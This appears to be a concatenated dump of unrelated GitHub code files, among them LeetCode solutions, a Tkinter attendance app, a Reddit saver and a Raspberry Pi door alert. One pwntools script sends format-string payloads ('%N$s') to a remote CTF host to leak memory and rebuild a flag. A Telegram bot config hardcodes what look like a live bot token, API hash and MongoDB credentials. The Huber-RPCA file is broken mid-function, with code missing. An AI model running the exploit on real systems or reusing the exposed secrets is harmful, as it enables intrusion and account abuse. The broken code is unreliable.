omkar = model.User.create_user(user_id=2, email='om@gmail.com')\n\n model.db.session.add_all([kailey, omkar])\n model.db.session.commit()\n\ndef load_reservations():\n \"\"\" Load reservations into the database. \"\"\"\n \n cantaloupe = model.Reservation.create_rez(user_id=1, start_date=datetime.strptime(\"2022-08-01\", \"%Y-%m-%d\"), rez_name=\"cantaloupes\")\n\n model.db.session.add_all(cantaloupe)\n model.db.session.commit()\n\nload_users()\n\n","repo_name":"kotynskm/melonrez","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29277982761","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom Functions.measures import True_Map,Estimated_Map\nfrom scene_data import dim_img,dim_scene,N,nx,nz,px,pz,dx,dz,R_mp\nfrom Functions.helpers import (csgn,vec,unvec,row_thres,svd_thres,blockshaped,unblockshaped,hub,\n prox_huber,prox_huber_norm,make_img)\nimport jax.numpy as jnp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.patches import Rectangle\ntargets = [(px[i],pz[i]) for i in range(len(px))]\nratio_dims = dim_scene/dim_img\n\ndef fobj_r(r,Psi_A,L,Y,c,block_size):\n ''' objective fct for r-step '''\n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape) \n Es = blockshaped(Y-L-Psi_I_kron_r,*(block_size))\n Es = Es.reshape(Es.shape[0],-1)\n Es_n = jnp.sqrt(jnp.apply_along_axis(jnp.sum,1,jnp.abs(Es)**2))\n Es_hub = hub(Es_n,c)\n sum_es = jnp.sum(Es_hub)\n return sum_es\n\n\ndef hkrpca_fd(Y,Psi,lbd,mu,nu,eta,c,block_size:tuple,eps=1e-3,nits=None,print_conv=False):\n \"\"\"\n Huber RPCA (with Kronecker structured sparsity) via decoupling & ADMM.\n\n Parameters\n ----------\n Y : array\n data matrix.\n Psi : array\n dictionary.\n lbd : scalar\n sparsity parameter.\n mu : scalar\n rank parameter.\n nu : scalar\n first equality constraint.\n eta : scalar\n second equality constraint.\n c : scalar\n Huber fct threshold.\n block_size : tuple\n size of a block considered by the Huber fct.\n nits : integer, optional\n number of iteration for the algo.\n r_nits : integer, optional\n number of iteration for r-step GD.\n\n Returns\n -------\n L : array\n low rank matrix recovered.\n r : array\n sparse vector recovered.\n \"\"\"\n \n ##Initialize variables\n #Primal variables\n L = jnp.zeros(Y.shape,dtype=Y.dtype)\n R = jnp.zeros((nx*nz,R_mp),dtype=Y.dtype)\n r = vec(R)\n #Secondary variable\n K = jnp.zeros(Y.shape,dtype=Y.dtype) #instead of M in the pdf\n S = jnp.zeros(R.shape,dtype=R.dtype)\n #Dual variable\n U = jnp.zeros(Y.shape,dtype=Y.dtype)\n V = jnp.zeros(R.shape,dtype=R.dtype)\n\n \n Psi_A = jnp.vstack(jnp.hsplit(Psi,N)) \n \n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n\n if not nits==None:\n it = 0\n \n res_hist = []\n time_hist = []\n\n \n cond=False\n \n t0 = time.time()\n\n while cond==False:\n\n #L-step\n \n if block_size == (1,1):\n Arg = K + U/nu - Y + Psi_I_kron_r\n L = csgn(Arg)*prox_huber(jnp.abs(Arg),c,mu/(2*nu)) + Y - Psi_I_kron_r\n else:\n Mat1 = blockshaped(K + U/nu ,*(block_size))\n Mat2 = blockshaped(-Y + Psi_I_kron_r ,*(block_size))\n \n L= []\n for i in range(Mat1.shape[0]):\n L.append(prox_huber_norm(Mat1[i,:,:] + Mat2[i,:,:],c,mu/(2*nu)) - Mat2[i,:,:])\n L = jnp.array(L)\n L = unblockshaped(L,*Y.shape)\n\n \n \n #R-step (MM)\n for itMM in range(1):\n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n \n E = Y-L-Psi_I_kron_r\n E = blockshaped(E,*(block_size))\n E = E.reshape(E.shape[0],np.prod(block_size))\n \n nE = jnp.apply_along_axis(jnp.linalg.norm,1, E)\n sqrtE = jnp.sqrt(c/nE)\n \n W = jnp.where(nE 10*dual_resL:\n nu = 2*nu\n elif dual_resL > 10*prim_resL:\n nu = nu/2\n \n prim_resR = jnp.linalg.norm(S-R)\n dual_resR = eta*jnp.linalg.norm(Sprev - S)\n \n if prim_resR > 10*dual_resR:\n eta = 2*eta\n elif dual_resR > 10*prim_resR:\n eta = eta/2\n \n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n\n #Convergence check\n res = (fobj_r(r,Psi_A,L,Y,c,block_size) + jnp.linalg.norm(S-R) +\n jnp.linalg.norm(K-L))/jnp.linalg.norm(Y)\n \n print(res, \" || \" , eps)\n \n \n if not nits==None:\n cond = it >= nits\n it += 1\n else:\n cond = res <= eps\n \n res_hist.append(res)\n time_hist.append(time.time())\n\n if print_conv:\n res_hist = np.array(res_hist) - res_hist[-1] \n time_hist = np.array(time_hist) - t0\n return L,K,R,S,res_hist,time_hist \n\n\n plt.plot(res_hist)\n plt.show()\n \n return L,K,R,S\n\n \ndef plot_hkrpca_fd(r,c,lbd,mu,nu,eta,plt_rect=False):\n #Plot \n fig, ax = plt.subplots()\n im = ax.imshow(np.abs(r),aspect='auto',\n extent = [0,dim_scene[0],0,dim_scene[1]])\n \n if plt_rect == True :\n for i in range(len(targets)):\n rect = Rectangle(targets[i] - 2/2 * np.array([dx,dz]), 2*dx, 2*dz,\n linewidth=1, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n \n ax.set_xticks(np.arange(0,dim_scene[0],0.5))\n ax.set_yticks(np.arange(0,dim_scene[1],0.5))\n ax.set_title(r\"$c$={}, $\\lambda$={}, $\\mu$={}, $\\nu$={},$\\eta$={}\".format(c,lbd,mu,nu,eta))\n fig.colorbar(im)\n plt.show()\n \n","repo_name":"hugobrh/hkrpca","sub_path":"Functions/hkrpca_fd.py","file_name":"hkrpca_fd.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27607457711","text":"import mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n port=3306,\n database=\"altOnline\"\n)\n\nmycursor = mydb.cursor()\n\ndef isLeafDepartment(departmentName):\n mycursor.execute(\"SELECT * FROM departments WHERE parentDepartment=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n if (len(myresult) == 0):\n return 1\n return 0\n\ndef getDepartmentProducts(departmentName):\n mycursor.execute(\"SELECT product_title, price_without_tax, discount, tax_to_add FROM products WHERE department=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n return myresult\n\ndef getChildDepartments(departmentName):\n mycursor.execute(\"SELECT department_title FROM departments WHERE parentDepartment=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n return myresult\n\ndef getProductDiscount(productTitle):\n mycursor.execute(\"SELECT discount FROM products WHERE product_title=%s\", (productTitle,))\n myresult = mycursor.fetchall()\n for x in myresult:\n return x\n\ndef setDiscount(productTitle, discount):\n mycursor.execute(\"UPDATE products SET discount = %s WHERE product_title=%s\", (discount, productTitle,))\n mydb.commit()\n\nprint(isLeafDepartment('IPads'))\n\nwhile (1):\n toDo = input(\"Do you want to list all products from a department or set discount for a specific product? (type 'dep' or 'disc' or 'quit') : \")\n if (toDo == 'dep'):\n department = input(\"Enter a department: \")\n if (isLeafDepartment(department)):\n products = getDepartmentProducts(department)\n print(\"The \" + department + \" have the following products:\")\n for product in products:\n price = int(round((float(product[1]) * (1 - 0.01 * float(product[2])) * (1 + 0.01 * float(product[3])))))\n print(product[0] + \", price: \" + \"$\" + str(price))\n else:\n childDepartments = getChildDepartments(department)\n print('Departments: ')\n for child in childDepartments:\n print(child[0])\n elif (toDo == 'disc'):\n productTitle = input(\"Enter a product title to get it's discount: \")\n discount = getProductDiscount(productTitle)[0]\n print(\"The discount for \" + productTitle + \" is \" + str(discount)+ \"%\")\n ans = input(\"Do you want to update the discount? (y for yes or n for no): \")\n\n if (ans == 'y'):\n newDiscount = input(\"Enter new discount: \")\n setDiscount(productTitle, newDiscount)\n newDiscount = getProductDiscount(productTitle)[0]\n print(\"New discount for \" + productTitle + \" is \" + str(newDiscount) + \"%\")\n elif (toDo == 'quit'):\n print('Bye!')\n break\n else:\n print(\"Error, you should write 'dep' or 'disc'\")\n","repo_name":"emanuelbodin/altOnline","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41086851343","text":"'''\n© Mrvishal2k2\nRenameBot\nThis file is a part of mrvishal2k2 rename repo \nDont kang !!!\n© Mrvishal2k2\n'''\nimport os \n\nclass Config(object):\n APP_ID = int(os.environ.get(\"APP_ID\", \"2980496\"))\n API_HASH = os.environ.get(\"API_HASH\", \"9415a61fedcc0f00f33667ca46e577a3\")\n TG_BOT_TOKEN = os.environ.get(\"TG_BOT_TOKEN\", \"1705260996:AAHfaDQeXP2ft11YF3OR4CMJccTeRxIK5VE\")\n AUTH_USERS = set(int(x) for x in os.environ.get(\"AUTH_USERS\", \"\").split())\n DOWNLOAD_LOCATION = \"./bot/DOWNLOADS\"\n DB_URI = os.environ.get(\"DATABASE_URL\", \"mongodb+srv://Prorenamer:Prorenamer@prorenamer.2sj6d.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n # owner is for log cmd only owner can use (this can be multiple users)\n OWNER_ID = [int(i) for i in os.environ.get(\"OWNER_ID\", \"1086432320\").split(\" \")]\n OWNER_USERNAME = os.environ.get(\"OWNER_USERNAME\", \"Deeks_04_8\")\n CUSTOM_CAPTION = os.environ.get(\"CUSTOM_CAPTION\",False)\n\n UPDATE_CHANNEL = os.environ.get(\"UPDATE_CHANNEL\", \"DB_ROBOTS\")\n \n\n \n","repo_name":"DB-ROBOTS/DB-RENAMER_PROV2","sub_path":"root/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3748594250","text":"import collections\nfrom typing import Dict, List\n\n\nclass Solution:\n def courseScheduleBfs(self, numCourses: int, prerequisites: List[int]) -> bool:\n pass\n\n def courseScheduleDfs(self, numCourses, prerequisites):\n preMap = { i: [] for i in range(numCourses) }\n for target, needed in prerequisites:\n preMap[target].append(needed)\n\n visit = set()\n\n def dfs(node):\n if node in visit:\n return False \n\n if preMap[node] == []:\n return True \n\n visit.add(node)\n\n for prereq in preMap[node]:\n if not dfs(prereq): return True\n\n visit.remove(node)\n preMap[node] = []\n return True\n\n for node in range(numCourses):\n if not dfs(node): return False \n return True\n\n\n def courseScheduleTopo(self, numCourses, prerequisites):\n adj = [set() for i in range(numCourses)]\n \n indegree = {i:0 for i in range(numCourses)}\n for u,v in prerequisites:\n indegree[v] += 1\n adj[u].add(v)\n \n q = collections.deque()\n for i in range(len(indegree)):\n if indegree[i] == 0:\n q.append(i)\n \n while q:\n size = len(q)\n for i in range(size):\n node = q.popleft()\n \n for neighbor in adj[node]:\n indegree[neighbor] -= 1\n if indegree[neighbor] == 0:\n q.append(neighbor)\n \n return max(indegree.values()) == 0\n\n\nif __name__ == '__main__':\n numCourses =5 \n prerequisites = [\n [0, 1],\n [0, 2],\n [1, 3],\n [1, 4],\n [3, 4]\n ]\n s = Solution()\n # print(s.courseScheduleBfs(numCourses, prerequisites))\n print(s.courseScheduleTopo(numCourses, prerequisites))","repo_name":"jprice8/interview-prep","sub_path":"graphs/courseSchedule.py","file_name":"courseSchedule.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11170858397","text":"#!/usr/bin/python3\n\"\"\"class Square that defines a square\"\"\"\n\n\nclass Square:\n \"\"\"\n class Square that defines a square\n Attributes:\n __size (int): size of the square private attribute\n Methods:\n __init__(self, size): initializes instance of the class\n \"\"\"\n def __init__(self, size=0):\n \"\"\"\n __init__(self, size): initializes instance of the class\n Args:\n size (int): size of the square\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n","repo_name":"AhmedElSaeedTalat/alx-higher_level_programming","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14424615061","text":"\"\"\"\nTime: O(n)\nSpace: O(n)\n\nNotes:\n1. node = queue.pop(0)\n2. res.insert(0, level)\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: A tree\n @return: buttom-up level order a list of lists of integer\n \"\"\"\n def levelOrderBottom(self, root):\n # write your code here\n if root is None:\n return []\n \n queue = [root]\n res = []\n \n while queue:\n level = []\n \n for _ in range(len(queue)):\n node = queue.pop(0)\n level.append(node.val)\n \n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n res.insert(0, level)\n \n return res\n","repo_name":"teslamyesla/leetcode","sub_path":"python/lintcode-0070-binary-tree-level-order-traversal-ii.py","file_name":"lintcode-0070-binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42062546700","text":"from gpiozero import Button\nfrom signal import pause\nimport requests\nimport json\nimport os\nfrom datetime import datetime, time\n\n# define the pin that the reed switch is connected to\nreed_switch = Button(17)\nifttt_key = os.environ['IFTTT_KEY']\n# define your IFTTT webhook URL\nifttt_url = 'https://maker.ifttt.com/trigger/door_alert/with/key/' + ifttt_key\n\ndef read_time_window():\n with open('time_window.json', 'r') as f:\n time_window = json.load(f)\n start_time = time(time_window['start_hour'], time_window['start_minute'])\n end_time = time(time_window['end_hour'], time_window['end_minute'])\n return start_time, end_time\n\ndef door_opened():\n start_time, end_time = read_time_window()\n\n # check the current time\n current_time = datetime.now().time()\n\n # check if the current time is within the defined window\n if start_time <= current_time <= end_time:\n print('Door opened during defined time window!')\n # send HTTP request to IFTTT\n response = requests.post(ifttt_url)\n\n # print response status (200 is success)\n print('Response status: ', response.status_code)\n else:\n print('Door opened outside of defined time window. No action taken.')\n\ndef door_closed():\n print('Door closed!')\n\n# define what happens when the switch opens and closes\nreed_switch.when_pressed = door_opened\nreed_switch.when_released = door_closed\n\n# keep the program running\npause()\n","repo_name":"0xmayday/raspberrypi-tools","sub_path":"door_alert/door_alert.py","file_name":"door_alert.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5005752162","text":"\nimport random\n\n# The average energy released per fission for 239Pu94 is 180 MeV. How much energy per fission is released if all the atoms in m g of pure 239Pu94 undergo fission.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 10000\n\nN = 6.023 * (10**23)\n\nfor i in range(no_of_samples):\n m = random.randint(1,20000)\n m = round(m/10,1)\n ques = \"The average energy released per fission for 239Pu94 is 180 MeV. How much energy per fission is released if all the atoms in \" + str(m) + \" g of pure 239Pu94 undergo fission.\\n\"\n answ = (N*m*180*1.6*(10**-13))/239\n answer = \"{:.2e}\".format(answ) + \"joule\\n\"\n qns.write(ques)\n ans.write(answer)\n\nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/AtomsAndNuclei/Fission/Fission.py","file_name":"Fission.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"12046001325","text":"# Challenge 2 (Creating a histogram)\nimport matplotlib.pyplot as plt\n\nnums = [0.5, 0.7, 1, 1.2, 1.3, 2.1]\nbins = [0, 1, 2, 3]\n\nplt.hist(nums, bins, color=\"black\")\nplt.xlabel(\"nums\")\nplt.ylabel(\"bins\")\nplt.title(\"Histogram of nums against bins\")\nplt.style.use('ggplot')\nplt.show()\n","repo_name":"izzyevermore/machine-learning-challenge","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5200691074","text":"import cv2\nimport dlib\nimport numpy as np \n\nimg = cv2.imread('C:\\\\Users\\\\smart\\\\Pictures\\\\opencv images\\\\lena.jfif')\nimg = cv2.resize(img, (0,0), None, 3,3)\nimgoriginal = img.copy()\n\ndetector = dlib.get_frontal_face_detector()\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = detector(gray)\n\nfor face in faces:\n\tx1,y1 = face.left(), face.top()\n\tx2,y2 = face.right(), face.bottom()\n\timgoriginal = cv2.rectangle(img, (x1,y1),(x2,y2), (255,0,0), 2)\n\ncv2.imshow('img', imgoriginal)\ncv2.waitKey(0)","repo_name":"Mohammed-Rahman-sherif/OpenCV-Basics-2","sub_path":"landmark detector/outerface.py","file_name":"outerface.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12979342558","text":"# -*- coding: utf-8 -*-\r\n\r\n# Class ISMN-6650-001\r\n# Irida Medina #\r\n\r\n\r\n# Assignment 1 - Question 2 -------------------------------------\r\n# Printing title\r\nprint('----------Largest of the three numbers----------');\r\n\r\n# Ask the user for the three numbers and assign them as float\r\nv_number_1 = float(input('Enter the first number: '));\r\nv_number_2 = float(input('Enter the second number: '));\r\nv_number_3 = float(input('Enter the third number: '));\r\n\r\n# Use if-elif-else to find the largest number\r\nif (v_number_1>v_number_2):\r\n v_max = v_number_1\r\nelif (v_number_2>v_number_3):\r\n v_max = v_number_2\r\nelse: v_max = v_number_3;\r\n\r\n#Print the result\r\nprint('The largest number is: %.1f' %v_max);\r\n\r\n","repo_name":"lunaim174/python_class","sub_path":"Irida Medina - A1 - Question 2.py","file_name":"Irida Medina - A1 - Question 2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28224067660","text":"import requests\nimport json\nimport sys\nimport click\nimport tabulate\n\nimport urllib3\nurllib3.disable_warnings()\n\ndef get_devices(server: str, domain: str, token: str) -> list:\n path: str = \"https://{}/securitymanager/api/domain/{}/device?page=0&pageSize=100\"\n headers: dict = {'Content-Type': 'application/json', 'X-FM-Auth-Token': token}\n try:\n response=requests.get(url=path.format(server, domain), headers=headers, verify=False)\n except requests.exceptions.HTTPError as errh:\n print (\"Http Error:\",errh)\n except requests.exceptions.ConnectionError as errc:\n print (\"Error Connecting:\",errc)\n except requests.exceptions.Timeout as errt:\n print (\"Timeout Error:\",errt)\n except requests.exceptions.RequestException as err:\n print (\"OOps: Something Else\",err)\n if response.ok:\n json_data: str = response.text\n devices: dict = json.loads(json_data)[\"results\"]\n table = list()\n\n for device in devices:\n tr = [device['name'], device['id']]\n table.append(tr)\n\n table_headers = [\"name\", \"id\"]\n try:\n click.echo(tabulate.tabulate(table, table_headers, tablefmt=\"fancy_grid\"))\n except UnicodeEncodeError:\n click.echo(tabulate.tabulate(table, table_headers, tablefmt=\"grid\"))\n\n else:\n sys.exit()\n ","repo_name":"WichoChuletas/firemon-asa","sub_path":"firemon_api/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73538067347","text":"# функция которая заполняет файл случайными парами чисел.\n# первуое число int второе - float разделены вертикальной чертой\n# минимальное число - -1000 макси - +1000\n# кол-во строк и имя файла передаются как аргументы функции\n\nimport random\nfrom pathlib import Path\n\nMIN_NUM = -1000\nMAX_NUM = 1000\n\ndef fill_number(name: str | Path, rows: int):\n with open(\"numbers.txt\", 'a', encoding='utf-8') as numbers:\n for _ in range(rows):\n num_int = random.randint(MIN_NUM, MAX_NUM)\n num_float = random.uniform(MIN_NUM, MAX_NUM)\n numbers.write(f'{num_int} | {num_float}\\n')\n\n\nif __name__ == '__main__':\n fill_number(\"numbers.txt\", 50)","repo_name":"ValeryBurlakov/python_based","sub_path":"seminars/seminar_7/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41220458201","text":"from tkinter import *\nimport tkinter as tk\nfrom PIL import ImageTk\nfrom Scrollbar import scrollbar\nimport datetime\nfrom datetime import timedelta\nfrom ServerSide.SelectOperation import SelectOperation\n\nclass YesterdayReportPage():\n def __init__(self, parent):\n self.parent = parent\n self.ligBluePrimColor = \"#F2F8FF\"\n self.font = \"Bahnschrift\"\n\n def draw(self):\n textColor = \"#0F4189\"\n horizontalDivider = ImageTk.PhotoImage(file=(\"Assets/horizontalDivider.png\"))\n\n rawData = SelectOperation().yesterdayAttendance()\n\n canvas = tk.Canvas(self.parent, bg=self.ligBluePrimColor, bd=0, width=730, height=524,\n highlightthickness=0)\n\n content_frame = Frame(canvas, bg=self.ligBluePrimColor, width=730, height=524)\n\n scrol = scrollbar(canvas, canvas, height=235)\n scrol.draw()\n\n content_frame.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n canvas.create_window((0, 0), window=content_frame, anchor=\"nw\")\n canvas.configure(yscrollcommand=scrol.get().set)\n\n canvas.place(x=0, y=0)\n\n self.date = Label(content_frame, text=f\"Date:-{datetime.date.today() - timedelta(days=1)}\",\n bg=self.ligBluePrimColor, bd=0, font=(self.font, 15, 'normal'), justify=\"center\")\n self.date.grid(row=0, columnspan=5, padx=300, pady=10)\n\n row = 0\n\n if len(rawData) > 0:\n for data in rawData:\n Label(content_frame, text=data[0], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 25, 'bold'),\n justify=\"center\").grid(row=row + 1, columnspan=5, padx=200, pady=20)\n\n Label(content_frame, text=\"Present\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'),\n justify=\"center\").grid(row=row + 2, column=0, pady=12, padx=70)\n\n Label(content_frame, text=data[1], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=0)\n\n Label(content_frame, text=\"Absent\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'),\n justify=\"center\").grid(row=row + 2, column=1, padx=70)\n\n Label(content_frame, text=data[2], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=1)\n\n Label(content_frame, text=\"Total\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 2, column=2, padx=70)\n\n Label(content_frame, text=data[3], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=2)\n\n horizontalbar = Label(content_frame, bg=self.ligBluePrimColor, bd=0, image=horizontalDivider)\n horizontalbar.photo = horizontalDivider\n horizontalbar.grid(row=row + 4, columnspan=5, pady=40)\n\n row += 4\n else:\n empty = Label(content_frame, text=\"No Data to Show Here\", bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'))\n empty.grid(row=1, columnspan=5)","repo_name":"ManishJangid007/Attendence-Management-System","sub_path":"Admin/attendancePanelFrame/yesterdayReportPage.py","file_name":"yesterdayReportPage.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21744209969","text":"#!/usr/bin/python3\n# Author: Hack.You\nfrom pwn import *\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=BytesWarning, message=\"Text is not bytes; assuming ASCII, no guarantees.\")\ncontext.log_level = 'info'\n\nflag = ''\n\nfor i in range(1, 100):\n try:\n io = remote('10.0.14.28', 1337, level='warn')\n io.recvuntil(\"Give me a word and i'll say it back at you...\")\n io.sendline('%{}$s'.format(i).encode())\n io.recvlines(2)\n result = io.recvline()\n if not b'nil' in result:\n print(str(i) + ': ' + str(result))\n try:\n # Decode, reverse endianess and print\n decoded = unhex(result.strip().decode()[2:])\n reversed_hex = decoded[::-1]\n print(str(reversed_hex))\n # Build up flag\n flag += reversed_hex.decode()\n except BaseException:\n pass\n io.close()\n except EOFError:\n io.close()\n\n# Print and close\ninfo(flag)\nwith open('result.txt', 'w') as file:\n file.write(flag)\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/echoctf/stringer/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18315124487","text":"import configparser\nimport csv\nimport json\nimport os\nimport praw\nfrom prawcore.exceptions import Forbidden\n\ncounter = 1\ncomment_file_name = \"input/saved_comments.csv\"\n\n# Read the configuration file\nconfig = configparser.ConfigParser()\nconfig.read('settings.ini')\n\n\nreddit_client = config['reddit_client']\nreddit = praw.Reddit(client_id=reddit_client['client_id'],\n client_secret=reddit_client['client_secret'],\n user_agent=reddit_client['user_agent'])\n\nquarantined_section = config['quarantined']\nfor quarantined_subreddit in quarantined_section:\n reddit.subreddit(quarantined_subreddit).quaran.opt_in()\n\ndef make_json_saver():\n obj_list = []\n def save_json(obj):\n if obj != None:\n obj_list.append(obj)\n return obj_list\n return save_json\n# Saves json to a list and returns the list\nsave_json = make_json_saver()\n\ndef save_to_json(dict_list):\n filename = \"saved_data/saved_comments_json.json\"\n \n if os.path.exists(filename) and os.path.getsize(filename) > 0: # check if file exists and is not empty\n with open(filename, 'r') as f:\n data = json.load(f)\n data.extend(dict_list)\n else:\n data = dict_list # if file does not exist or is empty, start with your new data\n\n with open(filename, 'w') as f:\n json.dump(data, f, indent=4)\n\ndef get_next_five_replies(comment):\n try: # Ensure we're working with the most up-to-date comment structure\n comment.refresh()\n\n # comment.replies.list() flattens the structure\n flat_comments = comment.replies.list()\n\n # If there are at least five comments, return the first five\n if len(flat_comments) >= 5:\n return flat_comments[:5]\n # Otherwise, return all available comments\n else:\n return flat_comments\n except praw.exceptions.ClientException as e:\n print(f\"{e}\\n5 next comments excluded\\n\")\n return None\n except Exception as e:\n print(f\"{e}\\n5 next comments excluded\\n\")\n return None\n\ndef count_lines(filename=\"saved_comments.csv\"):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n row_count = sum(1 for row in reader)\n return row_count-1\n\n\ndef comment_to_dict(comment):\n replies = get_next_five_replies(comment)\n next_comments = [{'body': reply.body, 'author': str(reply.author), 'score': reply.score} for reply in replies] if replies is not None else []\n try:\n return {\n 'body': comment.body,\n 'author': str(comment.author),\n 'score': comment.score,\n 'id': comment.id,\n 'created': comment.created_utc,\n 'subreddit': comment.subreddit.display_name,\n 'permalink': comment.permalink,\n 'subreddit': str(comment.subreddit),\n 'five_next_comments': next_comments,\n 'body_html': comment.body_html,\n \"post_info\": {\n \"title\": comment.submission.title,\n \"post_selftext\": comment.submission.selftext,\n \"post_id\": comment.submission.id,\n \"post_score\": comment.submission.score,\n \"post_url\": comment.submission.url,\n \"post_permalink\": comment.submission.permalink,\n }\n }\n except praw.exceptions.ClientException as e:\n print(f\"{e}\\n{comment.id} not saved\")\n return None\n\n\n \nwith open(comment_file_name, 'r') as f:\n reader = csv.reader(f)\n line_counter = count_lines(comment_file_name)\n print(f\"\\nThere are {line_counter} comments to save\\n\\n\")\n next(reader) # Skip header\n for row in reader:\n # Save to file if there are more than 50 saved comments\n if len(save_json(None)) >= 50:\n save_to_json(save_json(None))\n comment_id = row[0]\n try:\n print(f\"Saving number {counter}/{line_counter} id: {comment_id}\")\n comment = reddit.comment(id=comment_id)\n comment_dict = comment_to_dict(comment)\n #pprint(dict(comment_dict.items()))\n save_json(comment_dict)\n except Forbidden:\n print(f\"Access forbidden for comment with id: {comment_id}\")\n except Exception as e:\n print(f\"{e}\\n Something went wrong, comment with id: {comment_id} not saved\")\n finally: counter += 1\n\nsave_to_json(save_json(None))\nprint(\"\\nAll done!\\n\")\n\n","repo_name":"GenericUsername255/post_comment_downloader","sub_path":"save_comments.py","file_name":"save_comments.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41379515275","text":"def findCycle(adjList, n):\n for v in range(1, n+1):\n visited = [0 for i in range(n+1)]\n explore(adjList, visited, v)\n\n if visited[v] == 2:\n return 1\n return 0\n\ndef explore(adjList, visited, v):\n visited[v] += 1\n\n for u in adjList[v]:\n if visited[u] == 0:\n explore(adjList, visited, u)\n else:\n visited[u] += 1\n\nn, m = map(int, input().split())\nadjList = [[] for i in range(n + 1)]\nfor i in range(m):\n u, v = map(int, input().split())\n adjList[u].append(v)\n\nprint(findCycle(adjList, n))\n","repo_name":"macoto35/Graph_Algorithms","sub_path":"python/directedGraph/checkingConsistencyOfCSCurriculum.py","file_name":"checkingConsistencyOfCSCurriculum.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660426279","text":"# Complete the countingSort function below.\ndef countingSort(arr):\n \n result = []\n\n # 배열 내에서 가장 최대값을 구하고, count배열 내에 0부터 n까지의 